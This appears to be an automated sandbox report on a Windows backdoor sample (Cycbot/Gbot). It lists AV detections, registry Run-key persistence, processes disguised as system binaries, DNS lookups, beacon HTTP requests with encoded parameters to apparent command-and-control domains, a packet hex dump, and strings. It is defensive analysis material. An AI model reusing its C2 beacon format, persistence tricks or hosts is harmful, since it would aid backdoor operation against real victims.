Analysis Date2015-01-17 13:24:35
MD58c4470ae149269d2409f6a2126cd4dda
SHA11d5eaaf51ead368c7a7c67aef8b45ad50abd4cd1

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: d36ff634e54112afad9c46acbef6b408 sha1: 9084fe0bd907d9dbb18577c3b30b7ba24820c84a size: 101888
Section.rdata md5: 63d68bfaaf4ee8c774f933f84e49d246 sha1: 97d02411a1241856d77ef167237c308ec0c0138c size: 1024
Section.data md5: 2bb55a8b0676ca647a0f2062e6b755b1 sha1: 6b2340940e061fe81ed49de3773ce7c7dfa7e7a5 size: 20480
Section.rsrc md5: e540b75a180ac4af10e15a6c7097b00a sha1: 946d3ce6cfa9e4f533b72d5134560f7cdb01380c size: 1024
Timestamp2005-10-19 12:19:47
VersionPrivateBuild: 1123
PEhashc8a4da16bff8a22c284f459a26690761bfb64871
IMPhashd7b3697981a4bb7b090c3ebd4660478b
AV360 Safeno_virus
AVAd-AwareGen:Trojan.Heur.KS.1
AVAlwil (avast)Cybota [Trj]
AVArcabit (arcavir)Gen:Trojan.Heur.KS.1
AVAuthentiumW32/Goolbot.C.gen!Eldorado
AVAvira (antivir)TR/Crypt.XPACK.Gen
AVBullGuardGen:Trojan.Heur.KS.1
AVCA (E-Trust Ino)Win32/FakeSpypro.B!generic
AVCAT (quickheal)Backdoor.Cycbot.B
AVClamAVTrojan.Diple-19
AVDr. WebTrojan.DownLoader1.42564
AVEmsisoftGen:Trojan.Heur.KS.1
AVEset (nod32)Win32/Kryptik.IVA
AVFortinetW32/FakeAV.PACK!tr
AVFrisk (f-prot)W32/Goolbot.C.gen!Eldorado
AVF-SecureTrojan-Downloader:W32/Renos.GTC
AVGrisoft (avg)Agent.5.BJ
AVIkarusBackdoor.Win32.Gbot
AVK7Backdoor ( 003210941 )
AVKasperskyBackdoor.Win32.Gbot.bs
AVMalwareBytesSpyware.Passwords.XGen
AVMcafeeBackDoor-EXI.gen.e
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVMicroWorld (escan)Gen:Trojan.Heur.KS.1
AVRisingno_virus
AVSophosTroj/FakeAV-CDG
AVSymantecBackdoor.Cycbot!gen2
AVTrend MicroBKDR_CYCBOT.SME
AVVirusBlokAda (vba32)Backdoor.Gbot

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\svchost ➝
C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates FileC:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates Mutex{A5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates Mutex{C66E79CE-8005-4ed9-A6B1-4983619CB922}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{7791C364-DE4E-4000-9E92-9CCAFDDD90DC}
Creates Mutex{C66E79CE-8935-4ed9-A6B1-4983619CB925}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNSdolbyaudiodevice.com
Winsock DNSwww.google.com
Winsock DNSzoneck.com
Winsock DNSmotherboardstest.com
Winsock DNS127.0.0.1
Winsock DNSzonejm.com
Winsock DNSwww.internetsecure.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Network Details:

DNSwww.internetsecure.com
Type: A
198.203.191.132
DNSzoneck.com
Type: A
208.79.234.132
DNSwww.google.com
Type: A
173.194.37.82
DNSwww.google.com
Type: A
173.194.37.81
DNSwww.google.com
Type: A
173.194.37.80
DNSwww.google.com
Type: A
173.194.37.84
DNSwww.google.com
Type: A
173.194.37.83
DNSmotherboardstest.com
Type: A
204.11.56.45
DNSzonejm.com
Type: A
23.239.15.54
DNSxibudific.cn
Type: A
DNSdolbyaudiodevice.com
Type: A
HTTP GEThttp://zoneck.com/images/im133.jpg?tq=gJ4WK%2FSUh7zEhRMw9YLRsrCSUz%2Bvw8a3nNQLabnVsMLElls0rNa1x7KTVjnaoLe2wecnKK7Ql6TH51IortCC5IaGUUmp1NLyyZJqtUn5CGFIRQ%3D%3D
User-Agent: gbot/2.3
HTTP GEThttp://www.internetsecure.com/images/ismerch.gif?tq=gJ4WK%2FSUh5zAhRMw9YLJkMSTUivqg4acwZFEfqHXarVJ%2BQhhaGE%3D
User-Agent: gbot/2.3
HTTP GEThttp://www.google.com/
User-Agent:
HTTP GEThttp://www.google.com/
User-Agent:
HTTP GEThttp://motherboardstest.com/images/im134.jpg?tq=gK4QK%2FSUh7zEtRMw9YLRsrCiUz%2Bvw8a3nOQLabnVsMLEpls0rNa1x7KjVjnaoLe2wdcnKK7Qh%2FWR40c%2B2NfS8smiWoNJ%2BQhhSEU%3D
User-Agent: gbot/2.3
HTTP GEThttp://zoneck.com/images/im134.jpg?tq=gK4QK%2FSUh7zEtRMw9YLRsrCiUz%2Bvw8a3nOQLabnVsMLEpls0rNa1x7KjVjnaoLe2wdcnKK7Qh%2FWR40c%2B2NfS8smiWoNJ%2BQhhSEU%3D
User-Agent: gbot/2.3
HTTP GEThttp://motherboardstest.com/images/im135.jpg?tq=gL4SK%2FSUh7zEpRMw9JGd5dGwJk6s0824xLMjS9rWwLWyxSE6qaKxpMa1C2m51bCwxbFRK%2B%2FbxUqRSfkIYUhF
User-Agent: gbot/2.3
HTTP GEThttp://zonejm.com/images/im133.jpg?tq=gKZEtzyMv5rJqxG1J42pzMffBvUo1%2BjbwvgS917X65rJqlLfgPiWW1cg
User-Agent: gbot/2.3
HTTP GEThttp://motherboardstest.com/images/im133.jpg?tq=gKZEtzyMv5rJqxG1J42pzMffBvUo1%2BjbwvgS917X65rJqlLfgPiWW1cg
User-Agent: gbot/2.3
Flows TCP192.168.1.1:1033 ➝ 208.79.234.132:80
Flows TCP192.168.1.1:1034 ➝ 198.203.191.132:80
Flows TCP192.168.1.1:1035 ➝ 173.194.37.82:80
Flows TCP192.168.1.1:1036 ➝ 173.194.37.82:80
Flows TCP192.168.1.1:1037 ➝ 204.11.56.45:80
Flows TCP192.168.1.1:1038 ➝ 208.79.234.132:80
Flows TCP192.168.1.1:1039 ➝ 204.11.56.45:80
Flows TCP192.168.1.1:1040 ➝ 23.239.15.54:80
Flows TCP192.168.1.1:1041 ➝ 204.11.56.45:80

Raw Pcap
0x00000000 (00000)   47455420 2f696d61 6765732f 696d3133   GET /images/im13
0x00000010 (00016)   332e6a70 673f7471 3d674a34 574b2532   3.jpg?tq=gJ4WK%2
0x00000020 (00032)   46535568 377a4568 524d7739 594c5273   FSUh7zEhRMw9YLRs
0x00000030 (00048)   72435355 7a253242 76773861 336e4e51   rCSUz%2Bvw8a3nNQ
0x00000040 (00064)   4c61626e 56734d4c 456c6c73 30724e61   LabnVsMLElls0rNa
0x00000050 (00080)   3178374b 54566a6e 616f4c65 32776563   1x7KTVjnaoLe2wec
0x00000060 (00096)   6e4b4b37 516c3654 48353149 6f727443   nKK7Ql6TH51IortC
0x00000070 (00112)   43354961 4755556d 70314e4c 79795a4a   C5IaGUUmp1NLyyZJ
0x00000080 (00128)   7174556e 35434746 49525125 33442533   qtUn5CGFIRQ%3D%3
0x00000090 (00144)   44204854 54502f31 2e300d0a 436f6e6e   D HTTP/1.0..Conn
0x000000a0 (00160)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x000000b0 (00176)   6f73743a 207a6f6e 65636b2e 636f6d0d   ost: zoneck.com.
0x000000c0 (00192)   0a416363 6570743a 202a2f2a 0d0a5573   .Accept: */*..Us
0x000000d0 (00208)   65722d41 67656e74 3a206762 6f742f32   er-Agent: gbot/2
0x000000e0 (00224)   2e330d0a 0d0a                         .3....

0x00000000 (00000)   47455420 2f696d61 6765732f 69736d65   GET /images/isme
0x00000010 (00016)   7263682e 6769663f 74713d67 4a34574b   rch.gif?tq=gJ4WK
0x00000020 (00032)   25324653 5568357a 4168524d 7739594c   %2FSUh5zAhRMw9YL
0x00000030 (00048)   4a6b4d53 54556976 71673461 63775a46   JkMSTUivqg4acwZF
0x00000040 (00064)   45667148 58617256 4a253242 51686861   EfqHXarVJ%2BQhha
0x00000050 (00080)   47452533 44204854 54502f31 2e300d0a   GE%3D HTTP/1.0..
0x00000060 (00096)   436f6e6e 65637469 6f6e3a20 636c6f73   Connection: clos
0x00000070 (00112)   650d0a48 6f73743a 20777777 2e696e74   e..Host: www.int
0x00000080 (00128)   65726e65 74736563 7572652e 636f6d0d   ernetsecure.com.
0x00000090 (00144)   0a416363 6570743a 202a2f2a 0d0a5573   .Accept: */*..Us
0x000000a0 (00160)   65722d41 67656e74 3a206762 6f742f32   er-Agent: gbot/2
0x000000b0 (00176)   2e330d0a 0d0a                         .3....

0x00000000 (00000)   47455420 2f204854 54502f31 2e300d0a   GET / HTTP/1.0..
0x00000010 (00016)   436f6e6e 65637469 6f6e3a20 636c6f73   Connection: clos
0x00000020 (00032)   650d0a48 6f73743a 20777777 2e676f6f   e..Host: www.goo
0x00000030 (00048)   676c652e 636f6d0d 0a416363 6570743a   gle.com..Accept:
0x00000040 (00064)   202a2f2a 0d0a0d0a 456c6c73 30724e61    */*....Ells0rNa
0x00000050 (00080)   3178374b 54566a6e 616f4c65 32776563   1x7KTVjnaoLe2wec
0x00000060 (00096)   6e4b4b37 516c3654 48353149 6f727443   nKK7Ql6TH51IortC
0x00000070 (00112)   43354961 4755556d 70314e4c 79795a4a   C5IaGUUmp1NLyyZJ
0x00000080 (00128)   7174556e 35434746 49525125 33442533   qtUn5CGFIRQ%3D%3
0x00000090 (00144)   44204854 54502f31 2e300d0a 436f6e6e   D HTTP/1.0..Conn
0x000000a0 (00160)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x000000b0 (00176)   6f73743a 207a6f6e 65636b2e 636f6d0d   ost: zoneck.com.
0x000000c0 (00192)   0a416363 6570743a 202a2f2a 0d0a5573   .Accept: */*..Us
0x000000d0 (00208)   65722d41 67656e74 3a206762 6f742f32   er-Agent: gbot/2
0x000000e0 (00224)   2e330d0a 0d0a                         .3....

0x00000000 (00000)   47455420 2f204854 54502f31 2e300d0a   GET / HTTP/1.0..
0x00000010 (00016)   436f6e6e 65637469 6f6e3a20 636c6f73   Connection: clos
0x00000020 (00032)   650d0a48 6f73743a 20777777 2e676f6f   e..Host: www.goo
0x00000030 (00048)   676c652e 636f6d0d 0a416363 6570743a   gle.com..Accept:
0x00000040 (00064)   202a2f2a 0d0a0d0a 456c6c73 30724e61    */*....Ells0rNa
0x00000050 (00080)   3178374b 54566a6e 616f4c65 32776563   1x7KTVjnaoLe2wec
0x00000060 (00096)   6e4b4b37 516c3654 48353149 6f727443   nKK7Ql6TH51IortC
0x00000070 (00112)   43354961 4755556d 70314e4c 79795a4a   C5IaGUUmp1NLyyZJ
0x00000080 (00128)   7174556e 35434746 49525125 33442533   qtUn5CGFIRQ%3D%3
0x00000090 (00144)   44204854 54502f31 2e300d0a 436f6e6e   D HTTP/1.0..Conn
0x000000a0 (00160)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x000000b0 (00176)   6f73743a 207a6f6e 65636b2e 636f6d0d   ost: zoneck.com.
0x000000c0 (00192)   0a416363 6570743a 202a2f2a 0d0a5573   .Accept: */*..Us
0x000000d0 (00208)   65722d41 67656e74 3a206762 6f742f32   er-Agent: gbot/2
0x000000e0 (00224)   2e330d0a 0d0a                         .3....

0x00000000 (00000)   47455420 2f696d61 6765732f 696d3133   GET /images/im13
0x00000010 (00016)   342e6a70 673f7471 3d674b34 514b2532   4.jpg?tq=gK4QK%2
0x00000020 (00032)   46535568 377a4574 524d7739 594c5273   FSUh7zEtRMw9YLRs
0x00000030 (00048)   72436955 7a253242 76773861 336e4f51   rCiUz%2Bvw8a3nOQ
0x00000040 (00064)   4c61626e 56734d4c 45706c73 30724e61   LabnVsMLEpls0rNa
0x00000050 (00080)   3178374b 6a566a6e 616f4c65 32776463   1x7KjVjnaoLe2wdc
0x00000060 (00096)   6e4b4b37 51682532 46575234 30632532   nKK7Qh%2FWR40c%2
0x00000070 (00112)   42324e66 5338736d 69576f4e 4a253242   B2NfS8smiWoNJ%2B
0x00000080 (00128)   51686853 45552533 44204854 54502f31   QhhSEU%3D HTTP/1
0x00000090 (00144)   2e300d0a 436f6e6e 65637469 6f6e3a20   .0..Connection: 
0x000000a0 (00160)   636c6f73 650d0a48 6f73743a 206d6f74   close..Host: mot
0x000000b0 (00176)   68657262 6f617264 73746573 742e636f   herboardstest.co
0x000000c0 (00192)   6d0d0a41 63636570 743a202a 2f2a0d0a   m..Accept: */*..
0x000000d0 (00208)   55736572 2d416765 6e743a20 67626f74   User-Agent: gbot
0x000000e0 (00224)   2f322e33 0d0a0d0a                     /2.3....

0x00000000 (00000)   47455420 2f696d61 6765732f 696d3133   GET /images/im13
0x00000010 (00016)   342e6a70 673f7471 3d674b34 514b2532   4.jpg?tq=gK4QK%2
0x00000020 (00032)   46535568 377a4574 524d7739 594c5273   FSUh7zEtRMw9YLRs
0x00000030 (00048)   72436955 7a253242 76773861 336e4f51   rCiUz%2Bvw8a3nOQ
0x00000040 (00064)   4c61626e 56734d4c 45706c73 30724e61   LabnVsMLEpls0rNa
0x00000050 (00080)   3178374b 6a566a6e 616f4c65 32776463   1x7KjVjnaoLe2wdc
0x00000060 (00096)   6e4b4b37 51682532 46575234 30632532   nKK7Qh%2FWR40c%2
0x00000070 (00112)   42324e66 5338736d 69576f4e 4a253242   B2NfS8smiWoNJ%2B
0x00000080 (00128)   51686853 45552533 44204854 54502f31   QhhSEU%3D HTTP/1
0x00000090 (00144)   2e300d0a 436f6e6e 65637469 6f6e3a20   .0..Connection: 
0x000000a0 (00160)   636c6f73 650d0a48 6f73743a 207a6f6e   close..Host: zon
0x000000b0 (00176)   65636b2e 636f6d0d 0a416363 6570743a   eck.com..Accept:
0x000000c0 (00192)   202a2f2a 0d0a5573 65722d41 67656e74    */*..User-Agent
0x000000d0 (00208)   3a206762 6f742f32 2e330d0a 0d0a6f74   : gbot/2.3....ot
0x000000e0 (00224)   2f322e33 0d0a0d0a                     /2.3....

0x00000000 (00000)   47455420 2f696d61 6765732f 696d3133   GET /images/im13
0x00000010 (00016)   352e6a70 673f7471 3d674c34 534b2532   5.jpg?tq=gL4SK%2
0x00000020 (00032)   46535568 377a4570 524d7739 4a476435   FSUh7zEpRMw9JGd5
0x00000030 (00048)   6447774a 6b367330 38323478 4c4d6a53   dGwJk6s0824xLMjS
0x00000040 (00064)   39725777 4c577978 53453671 614b7870   9rWwLWyxSE6qaKxp
0x00000050 (00080)   4d613143 326d3531 62437778 6246524b   Ma1C2m51bCwxbFRK
0x00000060 (00096)   25324225 32466278 55715253 666b4959   %2B%2FbxUqRSfkIY
0x00000070 (00112)   55684620 48545450 2f312e30 0d0a436f   UhF HTTP/1.0..Co
0x00000080 (00128)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000090 (00144)   0a486f73 743a206d 6f746865 72626f61   .Host: motherboa
0x000000a0 (00160)   72647374 6573742e 636f6d0d 0a416363   rdstest.com..Acc
0x000000b0 (00176)   6570743a 202a2f2a 0d0a5573 65722d41   ept: */*..User-A
0x000000c0 (00192)   67656e74 3a206762 6f742f32 2e330d0a   gent: gbot/2.3..
0x000000d0 (00208)   0d0a6762 6f742f32 2e330d0a 0d0a6f74   ..gbot/2.3....ot
0x000000e0 (00224)   2f322e33 0d0a0d0a                     /2.3....

0x00000000 (00000)   47455420 2f696d61 6765732f 696d3133   GET /images/im13
0x00000010 (00016)   332e6a70 673f7471 3d674b5a 45747a79   3.jpg?tq=gKZEtzy
0x00000020 (00032)   4d763572 4a717847 314a3432 707a4d66   Mv5rJqxG1J42pzMf
0x00000030 (00048)   66427655 6f312532 426a6277 76675339   fBvUo1%2BjbwvgS9
0x00000040 (00064)   31375836 35724a71 6c4c6667 50695757   17X65rJqlLfgPiWW
0x00000050 (00080)   31636720 48545450 2f312e30 0d0a436f   1cg HTTP/1.0..Co
0x00000060 (00096)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000070 (00112)   0a486f73 743a207a 6f6e656a 6d2e636f   .Host: zonejm.co
0x00000080 (00128)   6d0d0a41 63636570 743a202a 2f2a0d0a   m..Accept: */*..
0x00000090 (00144)   55736572 2d416765 6e743a20 67626f74   User-Agent: gbot
0x000000a0 (00160)   2f322e33 0d0a0d0a 636f6d0d 0a416363   /2.3....com..Acc
0x000000b0 (00176)   6570743a 202a2f2a 0d0a5573 65722d41   ept: */*..User-A
0x000000c0 (00192)   67656e74 3a206762 6f742f32 2e330d0a   gent: gbot/2.3..
0x000000d0 (00208)   0d0a6762 6f742f32 2e330d0a 0d0a6f74   ..gbot/2.3....ot
0x000000e0 (00224)   2f322e33 0d0a0d0a                     /2.3....

0x00000000 (00000)   47455420 2f696d61 6765732f 696d3133   GET /images/im13
0x00000010 (00016)   332e6a70 673f7471 3d674b5a 45747a79   3.jpg?tq=gKZEtzy
0x00000020 (00032)   4d763572 4a717847 314a3432 707a4d66   Mv5rJqxG1J42pzMf
0x00000030 (00048)   66427655 6f312532 426a6277 76675339   fBvUo1%2BjbwvgS9
0x00000040 (00064)   31375836 35724a71 6c4c6667 50695757   17X65rJqlLfgPiWW
0x00000050 (00080)   31636720 48545450 2f312e30 0d0a436f   1cg HTTP/1.0..Co
0x00000060 (00096)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000070 (00112)   0a486f73 743a206d 6f746865 72626f61   .Host: motherboa
0x00000080 (00128)   72647374 6573742e 636f6d0d 0a416363   rdstest.com..Acc
0x00000090 (00144)   6570743a 202a2f2a 0d0a5573 65722d41   ept: */*..User-A
0x000000a0 (00160)   67656e74 3a206762 6f742f32 2e330d0a   gent: gbot/2.3..
0x000000b0 (00176)   0d0a743a 202a2f2a 0d0a5573 65722d41   ..t: */*..User-A
0x000000c0 (00192)   67656e74 3a206762 6f742f32 2e330d0a   gent: gbot/2.3..
0x000000d0 (00208)   0d0a6762 6f742f32 2e330d0a 0d0a6f74   ..gbot/2.3....ot
0x000000e0 (00224)   2f322e33 0d0a0d0a                     /2.3....


Strings
.

040904b0
1123
B&reak
C&ompile
&Data
MS Sans Serif
PrivateBuild
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
<1E<#L"
[|1mbm
2/5)Ws0^
'>2c7vgX
-2 df'{
]3;tA	6
4t'X>!
4Z.vGX
5;6\<9
5GXfX-3
5{H(-7
5;\n$X3
	5w'X]
6IKgXJ
6j{A]K
6n)5#{
7/]7&X*
8eXfXM
8X&X=&X
9}jfXX
{9uk&X
ccYc2c
'cc-Yzr
=cI|GX
c_K8%X
CloseHandle
CreateEventA
CreateSemaphoreA
CreateStdAccessibleObject
CreateThread
c}S4B!5V
@.data
dcII>C
DeleteCriticalSection
*d=GYn
dXFXK%XR
dXFXy'XX
(DX]gX
dXGXdX
dXgXNQ
dXi+ui
dX?&X6`
	DX%X+$XQ
EnterCriticalSection
EnumResourceNamesA
EP09fM5(
eX,dX0
EXh\'X
ExitProcess
eX)lyA
}eXM8[N
eXNeXk
eXngX=\c
[eXu8b
eX_uYV73
EXvu:3
.EX'XoL,
.EX-&Xq
eX&X'X"
FindClose
FindFirstFileW
FreeEnvironmentStringsA
fXFX$X
-FXfXZ
?_FXGX
~FX~k]m
FX]LeX
fXx[GX.4A
FX~XH&X
G$aK`KM
GetDriveTypeW
GetLastError
GetLocalTime
GetStartupInfoA
GetSystemTimeAsFileTime
GetThreadPriority
>`gMz\
g)VBd.
GX-eX[
GX=}n,
\	gXv-
>>gXYr
GXY'XC
gXzi<w@
_GXz*T.
GXzv.q
h4gX'XS
'H7_YW<
hhLocah
hLibrh
HX%XTU
,?I ='{
i7uMl1
-{IGUU
][Im<p
InitializeCriticalSection
i:OLz>:0
J,97'X
j>A4}J
JeXlw7|
jF;suc
j&XTdX
j&X'X!
J,Z$XgX!
KERNEL32.dll
-KF?n,
kFX&Xl*X)
KljEXx
&Ko<>q
K}S#6v
{=ktl.GX
LeaveCriticalSection
lh<ah6
LoadLibraryA
LresultFromObject
l?,T!2[
mfX).P
<NbP@k
NcYcc>x=[l
-,n%X}
^o^8_,0
o*9yMS}k
~oGXLm
OLEACC.dll
OlfXfX^
\oo[?o
o	$X7K@
p;'on{G
@^;q2nc
 q@{ow
`.rdata
ReadFile
ReleaseSemaphore
rU	xg>
SetEndOfFile
SetEvent
SetFilePointer
]T9U(h
TfX_GX
tgXJn#
!This program cannot be run in DOS mode.
t.&Xm_
U;(65n
uc5%X, 
UTW:A/]
vgXZ[y
vhc@d?
vRFsMz
=/w6{K
WaitForMultipleObjects
WaitForSingleObject
}W_{	b
W?DXZ%X
woZJ$X
WriteFile
w(S#zZ
>wykdX,C
X4Vl%X
X5X;dX
X6GX}}T
X*7NYZ
X|8dX[
X8[.w<S
%X8zn/j
X9eXy'X
X9gXm?
XDX]-[
%XdXfX
$XdXfX;q
XdXlfXc
XDXXEXYIb
X.DX	Y
X<EXfX&X
XeXgX1
%XEXu:
XEX.&X
XeX$XGX1
'XFXj~EXW
XFXn'Xu
X.fX\p
$XFX_'X
XfX&X2
&XFXX%X
XfXYDXp
XGXhFh}
XhHgXP
%XI4/fX?
X	I9~|
X]}J)VeX$X
XKdXFX{5
&X](~l
Xl?4gX84
XL<(DX8
XLV*)I
XN8z{^
x<NrUq
XO^dXFX1
Xo_dXt
%XoXtl
'XThLoad
XtzmxQ
XU(eXh
XUvgXc
xUv/wm!
XVfXNk
.&XVXhU
X_w|FX
X.wlGXs
XWx%XgX
X->&X*
?$X$X3
X'X5tGXEX
%X&XEX
X'XGX\
X'Xk^a
$X%XL]xN{%X!
X&XnGX3
X%Xo-T&
X'XTShd
XxW~}Z
X$X|^'X
X)'XYq
X}%XyWXN
X:YN>6
Xz5dX 
XzFX$X
XZgXfXZ
Y2fDC)
_YdXjH
Yh&XDXo
,>YvU>
z_c~fXb
}ZIDXC
}Zl&X2
zo$X_.H
ZueI:mG
Z-vieXr